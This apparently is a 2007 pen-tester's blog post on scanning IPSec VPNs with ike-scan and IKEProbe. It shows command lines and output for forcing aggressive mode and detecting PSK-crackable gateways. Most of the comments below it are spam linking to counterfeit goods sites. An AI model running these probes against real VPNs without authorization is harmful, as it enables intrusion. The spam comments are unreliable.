Wednesday, March 28, 2007

Testing for Cisco VPNs


Note: image from ike-scan wiki

Ok guys, I know ike-scan is out there for some time, but still i would love to blog about this. Cisco VPNs runs on UDP port 500 and most of us knows that Cisco VPN Concentrator 3000 is vulnerable to multiple attacks like DoS and Buffer Overflow. ike-scan will actually test for the presence of VPNs and check if the VPN is able to be forced into the Aggressive mode for cracking later on. And once the PSK is cracked, connection to the vulnerable server should be no problem. Personally, i had tested multiple VPNs and only find a Cisco VPN Concentrator 3000 vulnerable. Well, if you would love to know how to pen-test VPN, check out the following articles below:

http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide
http://www.securityfocus.com/infocus/1821

It will be very useful if you can go through the whole article and understand how IPSec works. As a penetration tester, below are the few commands i always used in the command prompt:

C:\ikescan>ike-scan xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.531 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=3 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=1 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -sport=0 -auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --vendor=00 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --vendor=f4ed19e0c114eb5
16faaac0ee37daf2807b4381f xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 retur
ned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx 443

As you can see the list goes on and on. In the last example highlighted in black, i specify the port to check if the VPN is running at port 443. I know Nortel can have VPN gateways running on SSL. The above results are from a Nortel VPN Gateway.

If you successfully found a vulnerable VPN server, the response would be as shown below:

C:\ikescan>ike-scan -v -s 0 xx.xx.xx.xx
Starting ike-scan 1.8 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
xx.xx.xx.xx Main Mode Handshake returned HDR=(CKY-R=fb07f15c64c1fef9) SA=(En
c=DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VI
D=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)

Ending ike-scan 1.8: 1 hosts scanned in 0.114 seconds (8.77 hosts/sec). 1 retur
ned handshake; 0 returned notify

--------------------------------------------------------------------------------------------------


C:\ikeprobe>ikeprobe xx.xx.xx.xx
IKEProbe 0.1beta (c) 2003 Michael Thumann (www.ernw.de)
Portions Copyright (c) 2003 Cipherica Labs (www.cipherica.com)
Read license-cipherica.txt for LibIKE License Information
IKE Aggressive Mode PSK Vulnerability Scanner (Bugtraq ID 7423)

Supported Attributes
Ciphers : DES, 3DES, AES-128, CAST
Hashes : MD5, SHA1
Diffie Hellman Groups: DH Groups 1,2 and 5

IKE Proposal for Peer: xx.xx.xx.xx
Aggressive Mode activated ...

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 1

0.000 3: ph1_initiated(00443ee0, 003b4760)
0.016 3: << ph1 (00443ee0, 244)
0.016 3: >> 84
0.016 3: sx_recv_notify: error 14
0.016 3: sx_purge_spi: implement me - 0
2.516 3: << ph1 (00443ee0, 244)
2.516 3: >> 84
2.516 3: sx_recv_notify: error 14
2.516 3: sx_purge_spi: implement me - 0
5.531 3: << ph1 (00443ee0, 244)
16.047 3: >> 84
16.047 3: sx_recv_notify: error 14
16.047 3: sx_purge_spi: implement me - 0
19.547 3: ph1_disposed(00443ee0)

Attribute Settings:
Cipher DES
Hash SHA1
Diffie Hellman Group 2

19.547 3: ph1_initiated(00443ee0, 003b4c08)
19.578 3: << ph1 (00443ee0, 276)
19.578 3: >> 437
19.625 3: ph1_get_psk(00443ee0)

*****************************************************************************
* System is vulnerable!! See http://www.securityfocus/bid/7423/ for details *
*****************************************************************************

13 comments:

Miqdad said...

Oes Tsetnoc one of the ways in which we can learn seo besides Mengembalikan Jati Diri Bangsa. By participating in the Oes Tsetnoc or Mengembalikan Jati Diri Bangsa we can improve our seo skills. To find more information about Oest Tsetnoc please visit my Oes Tsetnoc pages. And to find more information about Mengembalikan Jati Diri Bangsa please visit my Mengembalikan Jati Diri Bangsa page and other update like as Beratnya Mengembalikan Jati Diri Bangsa, Mengembalikan Jati Diri Bangsa di perpanjang and Jangan Berhenti Mengembalikan Jati Diri Bangsa. Thank you So much.

Oes Tsetnoc | Lanjutkan Mengembalikan Jati Diri Bangsa

Anonymous said...

Can anyone recommend the well-priced Remote Desktop system for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: N-able N-central inventory management
? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!

gaohui said...

The holidays are a time ed hardy of getting together with friends ed hardy shoes and family, attending elaborate ed hardy clothing parties, and other exciting events ed hardy clothes that involves dressing up in stunning ed hardy store wardrobes. If you ed hardy Bikini are pregnant during ed hardy swimsuits the holidays, it does not ed hardy Caps mean that you are unable buy ed hardy to look fabulous and ed hardy swimwear stylish. Now, an expectant ed hardy sale mother has many styles of chic ed hardy glasses maternity clothing that allows cheap ed hardy her to show off her baby bump Christian audigier while looking spectacular.

chunxue said...

During the World War II, Art Deco jewellery was ugg sale a very popular style among women. The females started ugg boots wearing short dresses and cut their hair short. And uggs such boyish style was accessorized with Art Deco jewellery. They used cheap ugg boots long dangling earrings and necklaces, multiple bracelets and bold ugg boots uk rings.Art Deco jewellery has harshly geometric and symmetrical theme instead disocunt ugg boots of free flowing curves and naturalistic motifs. Art Deco Jewelry buy ugg boots today displays designs that consist of arcs, circles, rectangles, squares, and ugg outlet triangles. Bracelets, earrings, necklaces and rings are added with long ugg boots outlet lines and curves.One example of Art Deco jewelry is the Art Deco ring. Art Deco rings have ugg mall sophisticated sparkle and bold styles. These rings are not intended for a subtle look, they are meant to be noticed. Hence, these are perfect for people with bold styles.

Anonymous said...

Hi Everybody! I'm from London but am living in Berlin at the moment.
Gotta love this forum!


____________________________________
[url=http://stephetteh.wordpress.com/]Barrater is my life[/url]

Anonymous said...

KhnGxy [url=http://www.bootsshowjp.com/]アグ ブーツ [/url] SavAdu http://www.bootsshowjp.com/ KmsOoq [url=http://www.mutonbu-tsu.com/]UGG AUSTRALIA[/url] FwmVkl http://www.mutonbu-tsu.com/ GqiOzz [url=http://www.australiabestboots.com/]ugg[/url] VktFmo http://www.australiabestboots.com/ UmhIxu[url=http://www.bestbootsjapan.com/]ugg[/url] ZzoFrf http://www.bestbootsjapan.com/ HwcKhr [url=http://www.bootshotsales.com/]ugg ブーツ[/url] LsmHmf http://www.bootshotsales.com/ EnyCqz [url=http://www.bootssaletojp.com/]ugg ブーツ[/url] TrvLna http://www.bootssaletojp.com/ OhmJie

Anonymous said...

CytLnb [url=http://www.bu-tsujapan.com/]アグ ブーツ[/url] KzdSkz http://www.bu-tsujapan.com/ QtbKph [url=http://www.bu-tsujp.com/]アグ ブーツ[/url] MroKis http://www.bu-tsujp.com/ KbbEiu [url=http://www.newbootstojp.com/]アグ[/url] SirDwn http://www.newbootstojp.com/ RriUzt [url=http://www.kutsujp.com/]UGG 通販[/url] XnuKep http://www.kutsujp.com/ SjgYej [url=http://www.bootsladiesnew.com/]ugg 販売[/url] MqbMge http://www.bootsladiesnew.com/ PixEtl [url=http://www.bu-tsugekiyasu.com/]アグ[/url] WizOns http://www.bu-tsugekiyasu.com/ OhoPeg

Anonymous said...

ZozMlg [url=http://www.bootsshowjp.com/]アグ [/url] DbtEno http://www.bootsshowjp.com/ OvgSwj [url=http://www.mutonbu-tsu.com/]UGG ムートン[/url] CexUlx http://www.mutonbu-tsu.com/ OxpMkl [url=http://www.australiabestboots.com/]アグ ブーツ[/url] NkoVxm http://www.australiabestboots.com/ NnjRfr[url=http://www.bestbootsjapan.com/]ugg ムートンブーツ[/url] PafNyz http://www.bestbootsjapan.com/ EdsGdp [url=http://www.bootshotsales.com/]ugg ブーツ[/url] NphPmo http://www.bootshotsales.com/ ThkNdz [url=http://www.bootssaletojp.com/]ugg ブーツ[/url] GjnFbh http://www.bootssaletojp.com/ EuhSwg

Anonymous said...

YeqAsx [url=http://www.bu-tsujapan.com/]ugg アウトレット[/url] KxpSfu http://www.bu-tsujapan.com/ DhaLdb [url=http://www.bu-tsujp.com/]ugg 激安[/url] SitWgm http://www.bu-tsujp.com/ BvpDvn [url=http://www.newbootstojp.com/]ugg メンズ[/url] XyjPgk http://www.newbootstojp.com/ MapHkp [url=http://www.kutsujp.com/]ugg[/url] TatRfv http://www.kutsujp.com/ AkkFae [url=http://www.bootsladiesnew.com/]UGG メンズ激安[/url] NsgVnr http://www.bootsladiesnew.com/ NssVuw [url=http://www.bu-tsugekiyasu.com/]ugg ブーツ[/url] DimUxv http://www.bu-tsugekiyasu.com/ ZioLga

Anonymous said...

Se la densità di esso è troppo alto, è più difficile fare il piumino moncleroutletsalevip.com pulito. Una volta che si utilizza detersivi di base e non può rimuovere il residuaal sufficientemente, il residuo può danneggiare la superficie del vostro piumino. Se si desidera rimuovere i residui di detergente alcalino, si può lavare due volte in acqua tiepida dopo, aggiungere due cucchiaini di aceto, e renderlo a bagno per un po non si può strizzare..
Fifty year ago, three Italian persons, including a skiing equipments manufacture, a skiing champion and a skiing coach, established deep friendship with each other. They all liked skiing. The friendship became deeper and deeper during their outdoor activities.
Fortunately, it is a lot more variety in existence concerning a lot of women of any age synthetic imitation leather apparel in comparison with fellas. It's possible you'll discover behaviours simillar to sexy dresses, sheets, outerwear; you can discover undoable spencer, suede choices, and even more. Models come moncler jackets in midsection, complete, 3/4 period of moncler jacket time, bit of, significant, xs, xl.
moncler pick your self

Anonymous said...

When we finally go through the concept of the word love, not just in terms of an enchanting relationship along with another, however , as being a experience that's engendered should you have miltchmonkey a more rewarding connection with yourself way too - or maybe to be a a feeling of higher unity household or perhaps humankind -- that will become a lot more really clear that every one any individual wants in your daily course is actually adore.

Anonymous said...

GwkQev [url=http://onnrainnmcm.com/#85327]MCM 長財布[/url] MwrCsc http://onnrainnmcm.com/ TxgEmv [url=http://mcmsenmon.com/#68686]MCM リュック[/url] DgdAbj http://mcmsenmon.com/ WbbGip [url=http://ninnkimcm.com/#03581]MCM 韓国[/url] GpyStl http://ninnkimcm.com/ JbnUow [url=http://kaidokumcm.com/#24487]MCM iphoneケース[/url] YlsTbk http://kaidokumcm.com/ XpuQez [url=http://manzokumcm.com/#10594]MCM バッグ[/url] CvmBfb http://manzokumcm.com/ FziWit http://chloenihon.com/ DmrXbk [url=http://chloenihon.com/]クロエ 長財布[/url] BnjA http://toumikousin.com/ FagHB [url=http://toumikousin.com/]TUMI 96141[/url] LnsJzE http://toumikakaku.com/ KweBaDJ [url=http://toumikakaku.com/]TUMI スーツケース[/url] JnrQnj [url=http://mcmhannbai.com/]MCM ショルダー[/url] EunNyj [url=http://mcmhannbai.com/]MCM 長財布[/url]

Anonymous said...

NsvIib [url=http://onnrainnmcm.com/#71462]MCM 財布[/url] JjsFti http://onnrainnmcm.com/ HhvTnu [url=http://mcmsenmon.com/#06114]MCM 財布[/url] NixGha http://mcmsenmon.com/ OnoEnt [url=http://ninnkimcm.com/#94566]MCM リュック[/url] YszPxi http://ninnkimcm.com/ RbmNmc [url=http://kaidokumcm.com/#53926]MCM 店舗[/url] OmbCfw http://kaidokumcm.com/ GidPlf [url=http://manzokumcm.com/#35738]MCM 韓国[/url] YhnBdl http://manzokumcm.com/ XwlAuh http://chloenihon.com/ RwjDcs [url=http://chloenihon.com/]クロエ バッグ[/url] FacZ http://toumikousin.com/ TxaBB [url=http://toumikousin.com/]TUMI 店舗[/url] EihRcQ http://toumikakaku.com/ HsbEbIV [url=http://toumikakaku.com/]TUMI 店舗[/url] PumNaj [url=http://mcmhannbai.com/]MCM 韓国[/url] BsmFhu [url=http://mcmhannbai.com/]MCM キーケース[/url]